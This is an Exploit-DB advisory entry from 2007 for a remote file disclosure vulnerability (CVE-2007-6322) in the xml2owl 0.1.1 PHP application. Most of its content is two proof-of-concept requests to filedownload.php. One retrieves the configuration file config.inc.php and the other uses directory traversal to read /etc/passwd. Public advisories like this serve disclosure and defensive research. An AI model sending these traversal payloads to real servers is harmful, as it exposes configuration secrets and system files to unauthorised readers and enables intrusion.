xml2owl 0.1.1 filedownload.php Remote File Disclosure Vulnerability

2007-12-13T00:00:00
ID EDB-ID:4729
Type exploitdb
Reporter GoLd_M
Modified 2007-12-13T00:00:00

Description

xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability. CVE-2007-6322. Webapps exploit for php platform

                                        
                                            xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
POC :
     /xml2owl-0.1.1/filedownload.php?file=config.inc.php
     /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd

# milw0rm.com [2007-12-13]